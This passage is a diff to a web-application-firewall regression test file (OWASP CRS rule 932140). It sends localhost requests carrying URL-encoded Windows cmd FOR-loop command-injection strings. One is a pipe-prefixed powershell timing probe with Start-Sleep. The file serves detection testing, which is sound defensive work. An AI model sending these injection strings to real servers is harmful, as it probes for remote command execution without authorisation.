localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2fd%20%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2fd%20%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 4 desc: for /r stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2fr%20c%3a%5c%20%25variable%20in%20%28set%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2fr%20c%3a%5c%20%25variable%20in%20%28set%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 5 desc: for /l stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2fl%20%25variable%20in%20%281%2c1%2c2%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2fl%20%25variable%20in%20%281%2c1%2c2%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 6 desc: for /f .. fileset stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28fileset%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28fileset%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 7 desc: for /f .. 
"string" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%22string%22%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%22string%22%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 8 desc: for /f .. 'command' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%27command%27%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%27command%27%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 9 desc: for /f .. 
`command` stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for%20%2ff%20%22usebackq%22%20%25variable%20in%20%28%60command%60%29%20do%20command" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-10 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%7Cfor+%2Ff+%22delims%3D%22+%25i+in+%28%27cmd+%2Fc+%22powershell.exe+-InputFormat+none+write+%27FJQPVY%27.length%22%27%29+do+if+%25i%3D%3D6+%28cmd+%2Fc+%22powershell.exe+-InputFormat+none+Start-Sleep+-s+2%22%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-11 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR++++++++++++++%25a+IN+%28set%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-12 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FD+++++++++++%25a+IN+%28dirs%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-13 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FD+%2FD++++++++%25a+IN+%28dirs%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-14 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28text%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-15 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28%22text%22%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-16 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FL+++++++++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-17 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FL+%2FL+%2FL+++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" - 
version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-18 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FR+C%3A%5Cbla++++%25A+IN+%28set%29+DO+abc" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-19 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+for+%25a+in+%28a%2Cb%2Cc%29+do+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-20 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25%25a+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-21 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+FOR+%25_+IN+%28a%2Cb%2Cc%29+DO+cmd" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-22 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: 
"OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=%26+FOR+%252+IN+%28a%2Cb%2Cc%29+DO+cmd"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-23
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=%26+FOR+%25-+IN+%28a%2Cb%2Cc%29+DO+cmd"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-24
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=%26+FOR+%25%2F+IN+%28a%2Cb%2Cc%29+DO+cmd"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-25
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=%26+FOR+%25%40+IN+%28a%2Cb%2Cc%29DO+cmd"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-26
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=%26+FOR+%25%5B+IN+%28a%2Cb%2Cc%29DO+cmd"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-27
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=%26+FOR+%25%5D+IN+%28a%2Cb%2Cc%29DO+cmd"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-28
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=%26+FOR+%25%7E+IN+%28a%2Cb%2Cc%29DO+cmd"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-29
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25A+IN+%28%22jejeje+brbr%22%29+DO+%40echo+pwnd"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-30
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25%25A+IN+++%28%22jejeje+brbr%22%29+DO+%40echo+pwnd"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-31
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+%28%27SET%27%29+DO+%40Echo+%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-32
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-33
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25%7E+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-34
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25G%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-35
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25%25G%22"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-36
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25G%22%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-37
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25%25G%22%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-38
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25A+%25B+%25D"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-39
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25%25A+%25%25B+%25%25D"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-40
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25G%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-41
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%25%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25%25G%29"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-42
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%2FL+%25G+IN+%281%2C1%2C5%29+DO+echo+%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-43
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%2FL+%25%25G+IN+%281%2C1%2C5%29+DO+echo+%25%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-44
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-45
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%25%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-46
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-47
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-48
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%2FD+%2Fr+%25G+in+%28%22User%2A%22%29+DO+Echo+We+found+%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-49
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C3+delims%3D%2C%22+%25%25G+IN+%28weather.txt%29+DO+%40echo+%25%25G+%25%25H"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-50
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%2FF+%22tokens%3D4+delims%3D%2C%22+%25%25G+IN+%28%22deposit%2C%244500%2C123.4%2C12-AUG-09%22%29+DO+%40echo+Date+paid+%25%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-51
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%2FF+%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-52
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%2FF+%25%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-53
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-54
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-55
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-56
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
- port: 80
- uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25%25G"
- version: HTTP/1.0
- output:
- log_contains: id "932140"
- - test_title: 932140-57
- desc: imported test
- stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Host: localhost
- User-Agent: "OWASP CRS test agent"
- method: GET
